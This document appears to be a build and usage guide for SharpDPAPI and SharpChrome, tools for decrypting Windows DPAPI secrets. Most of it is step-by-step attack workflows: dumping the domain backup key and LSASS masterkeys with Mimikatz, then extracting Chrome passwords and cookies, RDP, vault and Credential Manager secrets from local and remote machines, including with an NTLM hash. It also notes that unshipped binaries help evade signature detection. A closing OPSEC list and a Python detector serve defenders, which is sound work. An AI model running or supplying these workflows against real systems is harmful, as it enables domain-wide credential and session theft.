
Build Requirements

  • Visual Studio: Visual Studio 2019 Community Edition or later
  • .NET Framework: .NET Framework 3.5 (default) or .NET 4.0/4.5
  • Git: for cloning the repository
  • Windows OS: a Windows build environment is required

Compilation Steps

Step 1: Clone Repository

git clone https://github.com/GhostPack/SharpDPAPI
cd SharpDPAPI

Step 2: Open Solution

Open SharpDPAPI.sln in Visual Studio 2019 or later.

Step 3: Select Build Configuration

  • Choose the Release configuration (not Debug)
  • Target platform: Any CPU

Step 4: Build Projects

  • Build → Build Solution (or press Ctrl+Shift+B)
  • Both SharpDPAPI.exe and SharpChrome.exe will be compiled

Step 5: Locate Binaries

Compiled binaries will be in:
SharpDPAPI/SharpDPAPI/bin/Release/SharpDPAPI.exe
SharpDPAPI/SharpChrome/bin/Release/SharpChrome.exe

Targeting Different .NET Versions

SharpDPAPI defaults to .NET Framework 3.5 for maximum compatibility. However, you can retarget to .NET 4.0 / 4.5.

.NET 3.5 (Default):
Advantages:
  • Maximum compatibility
  • Runs on most Windows systems by default
  • Preferred for operational use
Disadvantages:
  • May not be installed on newer systems
  • Requires installation if not present
No changes needed - this is the default configuration.

If you change the target framework, ensure the target system has the appropriate .NET version installed.

Binary Distribution

SpecterOps does not provide pre-compiled binaries for SharpDPAPI or SharpChrome. You must compile from source.
Why no binaries?
  • Encourages understanding of the code
  • Prevents signature-based detection
  • Allows for customization
  • Avoids potential legal issues

Running SharpDPAPI

SharpDPAPI can be run by direct execution, through a PowerShell wrapper, over PSRemoting, or via execute-assembly. Direct execution:
# Basic execution
SharpDPAPI.exe

# Show command help
SharpDPAPI.exe --help

# Execute specific command
SharpDPAPI.exe triage /pvk:key.pvk

Command Line Syntax

SharpDPAPI

SharpDPAPI.exe <command> [arguments]
Available Commands:
  • backupkey - Retrieve domain DPAPI backup key
  • masterkeys - Decrypt user masterkeys
  • credentials - Decrypt Credential Manager credentials
  • vaults - Decrypt Windows Vault data
  • rdg - Decrypt RDP connection passwords
  • keepass - Extract KeePass master keys
  • certificates - Decrypt certificate private keys
  • triage - Run all user commands
  • ps - Decrypt PowerShell credential XML
  • blob - Decrypt arbitrary DPAPI blob
  • search - Search for DPAPI blobs
  • sccm - Extract SCCM credentials
  • machinemasterkeys - Decrypt machine masterkeys
  • machinecredentials - Decrypt system credentials
  • machinevaults - Decrypt system vaults
  • machinetriage - Run all machine commands

SharpChrome

SharpChrome.exe <command> [arguments]
Available Commands:
  • logins - Extract and decrypt saved passwords
  • cookies - Extract and decrypt cookies
  • statekeys - Extract AES state keys
  • backupkey - Retrieve domain DPAPI backup key

Quick Start Examples

# Decrypt current user's RDP passwords
SharpDPAPI.exe rdg /unprotect

# Extract current user's Chrome passwords
SharpChrome.exe logins

# Extract current user's Chrome cookies
SharpChrome.exe cookies /url:".*company\.com.*"

# Triage all machine DPAPI data
SharpDPAPI.exe machinetriage

# Use Mimikatz to get masterkeys
# mimikatz# sekurlsa::dpapi

# Triage user data with masterkeys
SharpDPAPI.exe triage {GUID1}:SHA1 {GUID2}:SHA1
SharpChrome.exe logins {GUID1}:SHA1 {GUID2}:SHA1

# 1. Get domain backup key
SharpDPAPI.exe backupkey /file:key.pvk

# 2. Triage local system
SharpDPAPI.exe triage /pvk:key.pvk
SharpChrome.exe logins /pvk:key.pvk
SharpChrome.exe cookies /pvk:key.pvk

# 3. Triage remote systems
SharpDPAPI.exe credentials /pvk:key.pvk /server:workstation.domain.com
SharpChrome.exe logins /pvk:key.pvk /server:workstation.domain.com

# Copy DPAPI data from target to analysis machine

# Decrypt with known password
SharpDPAPI.exe credentials /target:C:\Evidence\Credentials /password:Password123!

# Decrypt Chrome data with backup key
SharpChrome.exe logins /target:"C:\Evidence\Login Data" /pvk:key.pvk

Common Workflows

Workflow 1: Domain Compromise

# Step 1: Retrieve domain backup key (requires DA)
SharpDPAPI.exe backupkey /server:dc.domain.com /file:backup.pvk

# Step 2: Triage all users on current system
SharpDPAPI.exe triage /pvk:backup.pvk
SharpChrome.exe logins /pvk:backup.pvk
SharpChrome.exe cookies /pvk:backup.pvk /url:".*aws.*" /format:json

# Step 3: Remote system enumeration
SharpDPAPI.exe credentials /pvk:backup.pvk /server:workstation1.domain.com
SharpDPAPI.exe credentials /pvk:backup.pvk /server:workstation2.domain.com
SharpChrome.exe logins /pvk:backup.pvk /server:workstation1.domain.com

Workflow 2: Local System Compromise

# Step 1: Extract masterkeys from LSASS with Mimikatz
# mimikatz# privilege::debug
# mimikatz# sekurlsa::dpapi

# Step 2: Save masterkeys to file (format: {GUID}:SHA1 per line)
# {8abc35b1-b718-4a86-9781-7fd7f37101dd}:ae349cdd3a230f5e04f70fd02be69e2e71f1b017
# {feef7b25-51d6-4e14-a52f-eb2a387cd0f3}:f9bc09dad3bc2cd00efd903a9b61c42e6c9ab0f4

# Step 3: Triage with masterkey file
SharpDPAPI.exe triage /mkfile:masterkeys.txt
SharpChrome.exe logins /mkfile:masterkeys.txt

# Step 4: Machine triage (requires elevation)
SharpDPAPI.exe machinetriage

Workflow 3: Credential-Based Access

# If you have a user's password
SharpDPAPI.exe credentials /password:SecurePassword123
SharpDPAPI.exe vaults /password:SecurePassword123
SharpChrome.exe logins /password:SecurePassword123

# If you have NTLM hash
SharpDPAPI.exe credentials /ntlm:8846F7EAEE8FB117AD06BDD830B7586C
SharpChrome.exe cookies /ntlm:8846F7EAEE8FB117AD06BDD830B7586C

Output Management

Output can go to the console, to a file, or to a formatted output. Console output is the default behavior and prints to the console:
SharpDPAPI.exe credentials /pvk:key.pvk
Good for: interactive use, immediate feedback

Troubleshooting

Problem: Solution won’t build
Solutions:
  • Ensure Visual Studio 2019+ is installed
  • Verify .NET Framework 3.5 is installed
  • Clean solution (Build → Clean Solution)
  • Rebuild solution (Build → Rebuild Solution)
  • Check for missing NuGet packages
Problem: Target system doesn’t have .NET Framework
Solutions:
  • Install .NET Framework 3.5:
    # Windows 10/11
    DISM /Online /Enable-Feature /FeatureName:NetFx3 /All
    
    # Or via PowerShell
    Enable-WindowsOptionalFeature -Online -FeatureName NetFx3 -All
    
  • Or recompile for .NET 4.0/4.5
Problem: Commands run but no data is decrypted
Solutions:
  • Verify decryption method is correct:
    • Using /unprotect? Must run as target user
    • Using /pvk? Must have valid backup key
    • Using masterkeys? Must have correct GUIDs
    • Using /password? Must be correct password
  • Check if DPAPI data exists:
    • Credentials: %LOCALAPPDATA%\Microsoft\Credentials\
    • Vaults: %LOCALAPPDATA%\Microsoft\Vault\
    • Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\
Problem: Access denied when reading files
Solutions:
  • For user DPAPI: Run as target user or use valid decryption method
  • For machine DPAPI: Must run as Administrator
  • For remote systems: Must have admin access to target
  • For domain backup key: Must have Domain Admin privileges
Problem: Chrome logins/cookies won’t decrypt
Solutions:
  1. First decrypt the state key:
    SharpChrome.exe statekeys /pvk:key.pvk
    
  2. Then use the state key:
    SharpChrome.exe logins /statekey:EXTRACTED_KEY
    
  3. Or use automatic decryption:
    SharpChrome.exe logins /pvk:key.pvk
    
    (SharpChrome will automatically handle state key decryption)

Operational Security

Consider these OPSEC factors when using SharpDPAPI/SharpChrome in operations (detection vectors, mitigation strategies, and alternative execution). Detection vectors:
  • File reads of sensitive DPAPI locations
  • LSASS access for DPAPI_SYSTEM secret
  • Process execution of SharpDPAPI.exe/SharpChrome.exe
  • Network SMB access to remote systems
  • Domain controller backup key retrieval
  • Bulk credential file access
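The host-side detection vectors above, as an added example that is not part of SharpDPAPI, SharpChrome or their documentation: a small Python detector run over constructed Sysmon-style events. The ProcessCreate and ProcessAccess field names follow Sysmon Event ID 1 and Event ID 10 (Image, CommandLine, TargetImage, GrantedAccess); the FileRead event shape, the path fragments, the command-line tokens and the bulk-read threshold are assumptions chosen for illustration. The domain-controller-side vector (backup key retrieval) is not modelled here because it needs DC audit telemetry rather than endpoint events.

```python
"""Added example (not SharpDPAPI/SharpChrome code): map the host-side detection
vectors listed on this page onto a stream of Sysmon-style events.

Event shapes are a constructed, simplified JSON form of Sysmon Event ID 1
(ProcessCreate) and Event ID 10 (ProcessAccess). "FileRead" is an assumed shape
standing in for whatever file-access auditing the environment provides (for
example Security event 4663 with a SACL on the protected paths)."""
from collections import Counter

# Lower-cased path fragments for the DPAPI data locations the page lists, plus the
# user masterkey store (%APPDATA%\Microsoft\Protect; assumption: standard location).
SENSITIVE_PATH_FRAGMENTS = (
    "\\microsoft\\credentials\\",
    "\\microsoft\\vault\\",
    "\\microsoft\\protect\\",
    "\\google\\chrome\\user data\\",
)

# Command-line tokens taken from the SharpDPAPI/SharpChrome syntax shown on this page.
SUSPICIOUS_TOKENS = (
    "machinetriage", "triage", "backupkey", "masterkeys", "statekeys",
    "/pvk:", "/mkfile:", "/ntlm:",
)

PROCESS_VM_READ = 0x10  # access-right bit inside Sysmon's GrantedAccess value


def score_event(ev):
    """Return the alert reasons for one event (an empty list means no match)."""
    reasons = []
    kind = ev.get("event")
    if kind == "ProcessCreate":
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "").lower()
        if image.endswith(("sharpdpapi.exe", "sharpchrome.exe")):
            reasons.append("known tool image name")
        hits = [t for t in SUSPICIOUS_TOKENS if t in cmd]
        # Require two tokens so an ordinary word such as "triage" alone does not fire.
        if len(hits) >= 2:
            reasons.append("DPAPI tool command-line pattern: " + ", ".join(hits))
    elif kind == "ProcessAccess":
        if ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            # Sysmon reports GrantedAccess as a hex string such as "0x1010".
            granted = int(ev.get("GrantedAccess", "0x0"), 16)
            if granted & PROCESS_VM_READ:
                reasons.append("LSASS handle with PROCESS_VM_READ")
    elif kind == "FileRead":
        path = ev.get("TargetFilename", "").lower()
        if any(frag in path for frag in SENSITIVE_PATH_FRAGMENTS):
            reasons.append("read of a DPAPI-protected data location")
    return reasons


def analyze(events, bulk_threshold=3):
    """Score every event and flag processes that read many protected files."""
    alerts = []
    protected_reads = Counter()
    for ev in events:
        reasons = score_event(ev)
        if not reasons:
            continue
        alerts.append({"pid": ev.get("ProcessId"), "reasons": reasons})
        if ev.get("event") == "FileRead":
            protected_reads[ev.get("ProcessId")] += 1
    bulk = sorted(pid for pid, n in protected_reads.items() if n >= bulk_threshold)
    return {"alerts": alerts, "bulk_access_pids": bulk}


# Constructed sample telemetry for this example (not real logs). PID 4120 mimics the
# "triage /pvk:" quick-start usage above; PID 5001 is ordinary, benign activity.
SAMPLE_EVENTS = [
    {"event": "ProcessCreate", "ProcessId": 4120,
     "Image": "C:\\Users\\alice\\Downloads\\SharpDPAPI.exe",
     "CommandLine": "SharpDPAPI.exe triage /pvk:key.pvk"},
    {"event": "ProcessAccess", "ProcessId": 4120,
     "SourceImage": "C:\\Users\\alice\\Downloads\\SharpDPAPI.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"event": "FileRead", "ProcessId": 4120,
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\Credentials\\constructed_blob_1"},
    {"event": "FileRead", "ProcessId": 4120,
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Microsoft\\Vault\\constructed_vault_1"},
    {"event": "FileRead", "ProcessId": 4120,
     "TargetFilename": "C:\\Users\\alice\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"event": "ProcessCreate", "ProcessId": 5001,
     "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe triage-notes.txt"},
    {"event": "FileRead", "ProcessId": 5001,
     "TargetFilename": "C:\\Users\\alice\\Documents\\triage-notes.txt"},
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for alert in result["alerts"]:
        print(f"pid {alert['pid']}: {'; '.join(alert['reasons'])}")
    print("bulk credential file access by pids:", result["bulk_access_pids"])
```

Running the block over the constructed events raises five alerts, all for PID 4120, and flags that PID for bulk access to protected files; the benign notepad activity matches nothing because a single "triage" token is below the two-token threshold. In production, the image-name check is the weakest signal (a renamed binary defeats it), which is why the command-line, LSASS-access and file-read checks are kept independent of it.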
